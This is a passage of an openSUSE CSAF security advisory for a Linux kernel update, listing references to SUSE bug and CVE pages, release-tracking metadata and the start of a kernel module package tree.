"summary": "SUSE Bug 1257276",
"url": "https://bugzilla.suse.com/1257276"
},
{
"category": "self",
"summary": "SUSE Bug 1257277",
"url": "https://bugzilla.suse.com/1257277"
},
{
"category": "self",
"summary": "SUSE Bug 1257279",
"url": "https://bugzilla.suse.com/1257279"
},
{
"category": "self",
"summary": "SUSE Bug 1257282",
"url": "https://bugzilla.suse.com/1257282"
},
{
"category": "self",
"summary": "SUSE Bug 1257296",
"url": "https://bugzilla.suse.com/1257296"
},
{
"category": "self",
"summary": "SUSE Bug 1257309",
"url": "https://bugzilla.suse.com/1257309"
},
{
"category": "self",
"summary": "SUSE Bug 1257473",
"url": "https://bugzilla.suse.com/1257473"
},
{
"category": "self",
"summary": "SUSE Bug 1257504",
"url": "https://bugzilla.suse.com/1257504"
},
{
"category": "self",
"summary": "SUSE Bug 1257603",
"url": "https://bugzilla.suse.com/1257603"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-54031 page",
"url": "https://www.suse.com/security/cve/CVE-2024-54031/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37744 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37744/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37751 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37751/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37841 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37841/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37845 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37845/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37904 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37904/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37955 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37955/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38243 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38243/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38262 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38262/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38298 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38298/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38423 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38423/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38505 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38505/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38507 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38507/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38510 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38510/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38511 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38511/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38512 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38512/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38513 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38513/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38515 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38515/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38516 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38516/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38520 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38520/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38521 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38521/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38529 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38529/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38530 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38530/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38535 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38535/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38537 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38537/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38538 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38538/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38539 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38539/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38540 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38540/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38541 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38541/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38543 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38543/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38547 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38547/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38548 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38548/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38550 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38550/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38551 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38551/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38569 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38569/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38589 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38589/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38590 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38590/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38645 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38645/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39689 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39689/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39795 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39814 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39814/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39817 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39817/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39829 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39829/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39880 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39880/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39913 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39913/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39927 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39927/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40030 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40030/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40045 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40045/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40106 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40106/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40147 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40147/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40195 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40195/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40257 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40259 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40259/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40363 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40363/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68174 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68174/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68178 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68188 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68188/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68200 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68200/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68211 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68211/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68218 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68218/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68227 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68227/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68241 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68241/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68245 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68245/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68296 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68296/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68320 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68320/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68325 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68325/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68337 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68337/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68341 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68341/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68348 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68348/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68349 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68349/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68356 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68356/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68359 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68359/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68360 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68360/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68361 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68361/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68366 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68366/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68367 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68367/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68368 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68368/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68372 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68372/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68374 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68374/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68376 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68376/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68725 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68725/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68735 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68735/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68741 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68741/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68743 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68743/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68764 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68764/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68768 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68768/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68770 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68770/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68771 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68771/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68773 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68773/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68775 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68775/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68776 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68776/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68777 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68777/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68778 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68778/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68783 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68783/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68784 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68784/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68788 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68788/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68789 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68789/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68792 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68792/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68795 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68797 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68797/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68798 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68798/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68799 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68799/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68800 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68800/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68801 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68801/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68802 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68802/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68803 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68803/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68804 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68804/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68808 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68808/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68811 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68811/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68814 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68814/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68815 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68815/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68816 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68816/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68819 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68819/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68820 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68820/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68821 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68821/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68822 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68822/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71064 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71064/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71066 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71066/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71073 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71073/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71076 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71076/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71077 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71077/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71078 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71078/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71079 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71079/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71080 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71080/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71081 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71082 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71082/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71083 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71083/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71084 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71084/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71086 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71086/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71087 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71087/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71088 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71088/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71089 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71089/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71091 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71091/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71093 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71093/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71094 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71094/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71095 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71095/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71098 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71098/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71099 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71099/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71100 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71100/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71101 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71101/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71108 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71108/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71111 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71111/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71112 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71113 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71113/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71114 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71114/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71116 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71116/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71118 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71118/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71119 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71119/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71120 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71120/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71123 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71123/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71126 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71126/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71130 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71130/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71131 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71131/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71132 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71132/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71133 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71133/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71135 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71136 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71136/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71137 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71137/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71138 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71138/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71141 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71141/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71142 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71142/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71143 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71143/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71145 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71145/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71147 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71147/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71148 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71148/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71149 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71154 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71154/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71156 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71157 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71157/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71162 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71162/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71163 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71163/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22976 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22976/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22977 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22977/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22978 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22978/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22981 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22981/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22982 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22982/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22984 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22984/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22985 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22985/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22986 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22986/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22988 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22988/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22989 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22989/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22990 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22990/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22991 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22991/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22992 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22992/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22993 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22993/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22996 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22996/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22997 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22997/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22999 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22999/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23000 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23000/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23001 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23001/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23002 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23002/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23005 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23006 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23006/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23011 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23011/"
}
],
"title": "Security update for the Linux Kernel",
"tracking": {
"current_release_date": "2026-02-27T13:03:55Z",
"generator": {
"date": "2026-02-27T13:03:55Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:20287-1",
"initial_release_date": "2026-02-27T13:03:55Z",
"revision_history": [
{
"date": "2026-02-27T13:03:55Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"product": {
"name": "cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"product_id": "cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"product": {
"name": "cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"product_id": "cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"product": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"product_id": "cluster-md-kmp-default-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"product": {
"name": "cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"product_id": "cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"product_id": "dlm-kmp-64kb-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"product": {
"name": "dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
